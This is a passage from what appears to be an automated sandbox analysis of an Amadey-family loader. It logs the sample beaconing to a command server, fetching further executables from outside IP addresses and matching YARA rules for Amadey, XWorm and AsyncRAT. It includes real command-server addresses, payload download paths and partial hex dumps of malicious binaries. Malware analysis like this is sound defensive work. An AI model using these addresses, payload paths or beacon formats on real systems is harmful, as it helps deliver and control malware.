                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELr0Kg@`` @ `@TW @`HU@7'@6 8@XejnR`< `.text> `.rsrc @@.reloc@@B
                                                      Nov 30, 2024 18:08:14.041383028 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e2 f0 ef 14 c7 f1 1b 7e 6b 55 bc b7 0c bf f6 db 6b ba 1f 6a a7 d7 95 e3 3c c3 2b 0c aa
                                                      Data Ascii: ~kUkj<+GsxnwE`VQ~.3\RLRt2z'Ew%bDBMa6}Cjz3k(2N u|@Am23IUi]+,zJ
                                                      Nov 30, 2024 18:08:14.041393995 CET1236INData Raw: b9 83 ce 58 b8 b7 9e ab 59 31 2d cc cd ac b8 e4 6f c0 22 68 8c 39 9d 1d 21 27 5d 4f 01 d0 ac fd 70 2d 71 6e 93 bb b2 46 53 27 b1 bb 16 62 d3 69 c9 07 b6 e5 de d2 8e 82 12 f4 54 35 34 ab 16 06 e6 e2 f0 13 f6 d4 a9 4b 97 4a 5f 8d 33 c5 e0 9f ad df
                                                      Data Ascii: XY1-o"h9!']Op-qnFS'biT54KJ_3`#A^R?8)/@|l{$&<P}q>23)cBI[I-y|s/Y=#D96\Z)f|a;@:N/=EqeN%/;JL'r{]^
                                                      Nov 30, 2024 18:08:14.041790009 CET1236INData Raw: 5c 35 3b d3 6d 38 87 8d 05 c4 e9 75 d1 10 89 87 82 e9 91 e6 04 e3 cc 03 95 9e 00 86 35 96 1d bb 81 3b 9b 15 dd 26 61 3b 88 7b 4c 6e 8d c5 24 d4 5e 24 d1 cb d2 f5 f6 ca c1 5f 8a 51 47 49 ce b9 8b 5f 77 9a bd 46 87 1d 43 dd 1b 20 1f 3d c3 13 c3 02
                                                      Data Ascii: \5;m8u5;&a;{Ln$^$_QGI_wFC =<Udv^/#)=[PhEUk\Vgrn"nc;;cHiXLa\)/}GAa3p%o<5-\O9<!@BaBRuQ
                                                      Nov 30, 2024 18:08:14.041807890 CET1236INData Raw: ef 58 49 b9 f8 9d e0 8a 07 53 27 5b 74 dc 70 e1 f2 23 ef dd 46 58 a7 3c 35 d0 a6 af 97 6a 1d 81 33 fa 78 74 7d 41 15 55 77 7f be fe 68 3e 02 61 fe f0 5a 0d c8 3d 82 ac 3a fa 74 f5 7b 17 66 21 27 49 71 74 36 b6 0e 6c 45 77 7f 14 b2 b9 98 9c 30 2e
                                                      Data Ascii: XIS'[tp#FX<5j3xt}AUwh>aZ=:t{f!'Iqt6lEw0.rUO7v|/P0-'f<pgx0_b%x$]M?T7;wiX*u|*!{9~"k7lqO_n` B8=xC0sR
                                                      Nov 30, 2024 18:08:14.042654037 CET672INData Raw: 9d 15 29 c6 cf 1b c1 52 30 ef 25 71 cc be fc 6a f8 e3 fa 64 98 cc 82 f0 52 21 67 f3 2f 66 47 db 38 34 1b bc 3b 69 87 53 73 15 7a 72 78 24 f1 12 76 01 17 5e ee 4c 43 b1 93 d6 91 6f 25 26 d7 c7 da 28 7b 81 0d 35 f9 0d 6e 08 4e 2c 0a 7c 8f 26 17 c0
                                                      Data Ascii: )R0%qjdR!g/fG84;iSszrx$v^LCo%&({5nN,|&" mfog3Uwy.e<?(g e)ABSN!K6KGMJGieQ#2G9UA>ga6GB2Z}IF0r@Y miB2`*7Q,
                                                      Nov 30, 2024 18:08:14.042665958 CET1236INData Raw: 88 e8 3a 7d 84 a7 bf ee 37 ba fc ed 29 37 f5 18 48 96 94 d7 cc 18 50 65 33 83 89 ab b7 0d 5c 3d 9b d4 0b 55 a9 46 ef 45 ba f1 87 c9 3c 4e ac 1a b8 e0 47 c3 17 41 87 a7 51 b9 a3 bc 25 b0 61 dd 4b b6 4b 9c c2 c0 ed db 24 d6 24 d9 4f 25 1d d4 8f 87
                                                      Data Ascii: :}7)7HPe3\=UFE<NGAQ%aKK$$O%q7t&yBI5Xpzi:b`cUsWL:(QqMN#&bB0S.qH?]b3o%OxL;YxAy9'`StnlK|5
                                                      Nov 30, 2024 18:08:14.042674065 CET224INData Raw: 46 03 8c 12 09 a1 fd f2 c8 31 b7 82 09 80 36 c9 06 45 81 22 e5 dd 82 53 ff be a0 96 eb 4a db 5d ce b9 4f 8c 3b e5 cc d2 1b 98 18 cd 34 eb 0f ce 3b 29 07 2d e0 68 b1 41 48 c6 42 fc 3a c4 8b df 8f 14 b2 d5 dc bd 4a 16 06 4a d5 3a 6f 20 5e 84 4e 78
                                                      Data Ascii: F16E"SJ]O;4;)-hAHB:JJ:o ^Nx$.{T)1pwMoYF:yB)t}Q2Cc?Zk})=4nZT=MG'xV0JNL|%|TBoq
                                                      Nov 30, 2024 18:08:14.043595076 CET1236INData Raw: c1 4e 0e c4 ea e7 4f b6 9c e5 96 65 84 f3 19 b0 04 6c 79 19 55 40 29 73 64 b3 a6 52 8c 19 02 07 46 8b 43 05 86 e4 4c 01 3e 95 4d 71 3e 67 5c 8b ba b3 ad 27 a0 03 b7 34 eb b6 09 3e 30 5b 91 3b 65 71 20 6a 00 ba 78 71 d0 d8 86 68 c7 0c 42 7a 51 f7
                                                      Data Ascii: NOelyU@)sdRFCL>Mq>g\'4>0[;eq jxqhBzQ)Grbpu&F1g\8j,#/#Boe=.tF5~-Z-v:W6g`zO#Xf~[eHZ5[C<8m
                                                      Nov 30, 2024 18:08:14.043606997 CET1236INData Raw: 93 88 b3 79 df ed 68 e0 32 27 f7 67 dc 7d 43 ae 8f 0f 53 dc 5a c9 9e c9 92 a8 a0 c0 a0 54 fa 80 a9 45 b4 9c 92 f3 55 4e 4f 8e 9e 26 42 e4 25 19 65 0f c4 8f 21 db a4 e2 25 81 30 0d 0a 5f 9f ed d4 03 ca 20 05 2e 5e 9b 70 46 bd 32 0e 8f 15 66 cd 28
                                                      Data Ascii: yh2'g}CSZTEUNO&B%e!%0_ .^pF2f(5R{g^~/3MJYXVw4R(RVU${=!P[z6%}*@%clv<=}O5 [AzF'bv/{P('>Nq1^iKR}>@Te
                                                      Nov 30, 2024 18:08:14.161168098 CET1236INData Raw: 80 cb 04 3a 5b de c4 71 9d 84 f1 f8 b4 60 75 33 3f 0e 09 9e 39 e5 5b 93 df 54 3d 70 89 28 aa 74 57 2d 1b 5b 3d 0e f8 90 a2 10 47 02 e9 ee 10 f7 4f 65 a4 4b 0c 72 68 51 1c 38 13 b0 b4 b4 42 91 bc e4 2c f2 8c 85 25 28 db ed 0f 39 f0 79 9d ef 68 33
                                                      Data Ascii: :[q`u3?9[T=p(tW-[=GOeKrhQ8B,%(9yh3%q$Dom+WFI/' Lo"P~sZ/k}w{To?_T.b3D@I0nHU5MLXS2>h15_6N1Rn||$SEm@d8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449784185.215.113.43802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:16.743302107 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 31 30 36 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1010698001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.44980531.41.244.11802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:25.881870985 CET66OUTGET /files/1824233174/EJQ2xs8.exe HTTP/1.1
                                                      Host: 31.41.244.11
                                                      Nov 30, 2024 18:08:27.266585112 CET1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Sat, 30 Nov 2024 17:08:27 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1723904
                                                      Last-Modified: Sat, 30 Nov 2024 16:06:35 GMT
                                                      Connection: keep-alive
                                                      ETag: "674b380b-1a4e00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 72 30 4b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 7e 00 00 00 08 00 00 00 00 00 00 00 20 44 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 ef b3 1a 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 00 00 69 00 00 00 00 a0 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELr0Kg~ D @ `D@Ui8 @ @.rsrc8`@.idata d@ `)f@dvpnmyli@*h@lhlewnhz D(@.taggant@ D",@
                                                      Nov 30, 2024 18:08:27.266836882 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.266845942 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.267103910 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.267115116 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.267925024 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.267935991 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.267940044 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.268619061 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:27.268627882 CET224INData Raw: 0f 77 8a c7 af 52 97 83 59 76 73 a7 01 52 5f 6e 8e ba 64 8c cb 31 70 ba 00 94 53 89 f9 56 7d 17 8c d4 44 63 6d 4e 54 a4 e6 51 cb 89 f4 33 91 32 08 eb 74 96 05 38 69 69 20 95 ca 67 c3 78 6a 0b f8 1c 4b 8c a2 bc 41 a0 06 7c 5f ec cb 4d 8d 8c c8 fa
                                                      Data Ascii: wRYvsR_nd1pSV}DcmNTQ32t8ii gxjKA|_MhmKlMzu]\{tMM6whtmf&ZUIX~w|gMoOL2y9wMe\vH1|A|nmePVqoy
                                                      Nov 30, 2024 18:08:27.387670994 CET1236INData Raw: d4 fb f0 64 d5 8f 78 f5 69 29 6a b5 d6 71 f6 b6 f7 55 fb b4 d1 b3 71 e8 9f 54 66 e8 c3 72 3b 96 f3 bc f7 65 52 57 52 94 cd b8 59 d4 2d 9d ae c4 c5 eb b8 70 25 5e 16 6f e9 73 5a f0 b3 74 96 e3 00 75 81 5b 26 bb 70 65 28 ef 39 68 08 26 39 6e ec 7b
                                                      Data Ascii: dxi)jqUqTfr;eRWRY-p%^osZtu[&pe(9h&9n{uhyout}gXyx`K[LCEsDUt<<w>:xeuuW^|t9`%3xms}I:&B5qHzTupofxk~a`|g|hV3


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449820185.215.113.43802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:32.724701881 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 31 30 37 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1010706001&unit=246122658369
                                                      Nov 30, 2024 18:08:34.188195944 CET193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Sat, 30 Nov 2024 17:08:33 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.449823185.215.113.16802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:34.316881895 CET55OUTGET /luma/random.exe HTTP/1.1
                                                      Host: 185.215.113.16


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.449837185.215.113.16802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:39.529777050 CET55OUTGET /luma/random.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Nov 30, 2024 18:08:40.968208075 CET1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Sat, 30 Nov 2024 17:08:40 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1848320
                                                      Last-Modified: Sat, 30 Nov 2024 16:25:11 GMT
                                                      Connection: keep-alive
                                                      ETag: "674b3c67-1c3400"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c0 00 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 64 8a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELB3Gg`I@Id@\`pPa @X@.rsrcPh@.idata `j@ @*pl@enyyijut/n@ijrsozmwPI@.taggant0`I"@
                                                      Nov 30, 2024 18:08:40.968367100 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:40.969157934 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:40.969377041 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:40.969386101 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:40.970120907 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Nov 30, 2024 18:08:40.970364094 CET1236INData Raw: 69 7d d3 32 6a 2c 80 52 93 0c 6b 35 ca 56 a6 f4 31 52 81 29 17 a1 0a 09 3b 09 46 f2 f1 c3 7f 8e 33 bb ba 6a 85 dd 86 19 4a b3 62 fd 9b 7c d3 18 2a c1 87 07 d8 0f 23 3d 3c 13 33 90 71 ff 7f 17 a8 4e 2f 3a 95 ba 64 c2 6c 16 6a f6 24 cb 76 56 58 63
                                                      Data Ascii: i}2j,Rk5V1R);F3jJb|*#=<3qN/:dlj$vVXc@jR$0+#5ZPDAju>C)ZvV#4])TGlcz6tj-@@ZWWWYUOD.8,P3kXC?'BX
                                                      Nov 30, 2024 18:08:40.970372915 CET248INData Raw: db f1 3f d5 74 e2 20 ca 01 46 3b 79 ea 7b 23 cf c4 c3 62 4a fe 1d bd 1a fa a0 b1 6d ee f5 e1 65 34 57 69 93 4c 0a c9 13 6c a0 84 56 cb ab 53 3e 70 93 06 46 0a 9b 52 cf ae 74 22 59 ab ff 77 8d 4a 97 c0 35 fc 92 12 c1 18 01 2d 57 ec 6f 77 62 48 fc
                                                      Data Ascii: ?t F;y{#bJme4WiLlVS>pFRt"YwJ5-WowbH,2Dz!ly)7f4/%7uoCm{r^'$XUy=KwTshbB )"BI>H/f>uzo3k*nv0But@
                                                      Nov 30, 2024 18:08:40.970798016 CET1236INData Raw: d3 9a e5 f5 e2 b2 f1 13 e6 27 67 f7 e8 24 3c 69 24 73 e1 3d 85 82 40 d7 90 c5 77 71 3c 19 9b a1 ab 5b 4b 35 83 dc 0f 97 7d eb 13 aa 8b fd 33 59 81 0f 31 23 ce 67 d0 e4 a9 ca 4c 36 ca 6a 4a 84 c1 0c 57 86 e9 24 2a b2 2f 88 4e e5 b8 ed ac 48 11 91
                                                      Data Ascii: 'g$<i$s=@wq<[K5}3Y1#gL6jJW$*/NH9&.h.suxVS0(W>.%p?apD9ZMhXXMSG5*MDKThdp'GpJobWC#KWNRXruA.n'
                                                      Nov 30, 2024 18:08:40.971182108 CET1236INData Raw: 24 f5 15 e0 aa b4 a2 4e 2e 73 d2 ad c5 26 04 aa 5a f7 8a 03 19 bf da b9 0f 57 62 4d 06 5f 1b 91 60 a4 ac 57 b8 2e 45 d5 73 61 47 42 c0 6e 88 57 f0 0b 5b 23 90 74 d9 0a fc 91 92 07 92 51 d2 ad 2b a6 8a 78 65 ca 52 b0 fc c5 8a a6 72 86 50 2f 2e af
                                                      Data Ascii: $N.s&ZWbM_`W.EsaGBnW[#tQ+xeRrP/.EX!tX)$;A#X'{+$SIU2e28j3Wbbwu! x2sSKE=Bm{9v#Q76U2(Vo>lD>O'm&.qL/-p>WA
                                                      Nov 30, 2024 18:08:41.171744108 CET1236INData Raw: 70 96 7a 11 a0 66 43 6a a9 05 dc 99 9a 52 54 18 e5 a5 c1 10 62 a4 56 02 ac a6 48 7e 93 27 fa 94 70 db ed 18 48 06 c7 87 5d ca 6e a5 aa 6b 6f 4e 6b 06 6e d9 69 8d 39 12 38 e7 72 62 63 16 fb f9 2f 7b 37 f8 9b fc 66 d0 69 19 75 d4 90 5a 96 ef 29 f4
                                                      Data Ascii: pzfCjRTbVH~'pH]nkoNkni98rbc/{7fiuZ)E~>BbUmWJdhxf';'xNXQF[Zs@}zYF6jRr?diwlhYU6>@-7%0EUA==ovqk:~)q44


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.449850185.215.113.16802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:46.817097902 CET139OUTGET /luma/random.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      If-Modified-Since: Sat, 30 Nov 2024 16:25:11 GMT
                                                      If-None-Match: "674b3c67-1c3400"
                                                      Nov 30, 2024 18:08:48.267802000 CET192INHTTP/1.1 304 Not Modified
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Sat, 30 Nov 2024 17:08:47 GMT
                                                      Last-Modified: Sat, 30 Nov 2024 16:25:11 GMT
                                                      Connection: keep-alive
                                                      ETag: "674b3c67-1c3400"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.449860185.215.113.43802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:50.928807974 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 31 30 37 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1010714001&unit=246122658369


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:12:06:54
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                      Imagebase:0xc70000
                                                      File size:1'884'160 bytes
                                                      MD5 hash:795DC87C1AF119B6D27E01167FC129D2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1708915780.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1668428517.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:12:06:57
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                      Imagebase:0xfa0000
                                                      File size:1'884'160 bytes
                                                      MD5 hash:795DC87C1AF119B6D27E01167FC129D2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1740413865.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1700108911.0000000005650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 53%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:12:06:59
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Imagebase:0xfa0000
                                                      File size:1'884'160 bytes
                                                      MD5 hash:795DC87C1AF119B6D27E01167FC129D2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1718912522.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1761097528.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:12:08:00
                                                      Start date:30/11/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Imagebase:0xfa0000
                                                      File size:1'884'160 bytes
                                                      MD5 hash:795DC87C1AF119B6D27E01167FC129D2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2320707751.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
